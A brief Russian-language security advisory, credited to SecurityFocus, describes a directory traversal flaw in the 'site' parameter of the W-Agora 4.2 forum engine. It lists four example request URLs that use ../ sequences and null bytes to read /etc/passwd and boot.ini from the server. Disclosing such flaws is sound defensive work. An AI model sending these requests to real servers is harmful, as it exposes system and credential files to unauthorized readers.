Обнаружена опасная уязвимость в "движке" форума W-Agora 4.2, позволяющая злоумышленнику получить произвольный файл с веб-сервера. Уязвимость заключается в недостаточной проверке относительных путей передаваемых скрипту в параметре "site". Примеры URL запросов, использующих эту уязвимость с целью получения файлов сервера:
"http://www.example.com/w-agora/index.php?site=../../../../../../../../etc/passwd%00
http://www.example.com/w-agora/index.php?site=../../../../../../../../etc/passwd
http://www.example.com/w-agora/index.php?site=../../../../../../../../boot.ini%00
http://www.example.com/w-agora/index.php?site=../../../../../../../../boot.ini"
SecurityFocus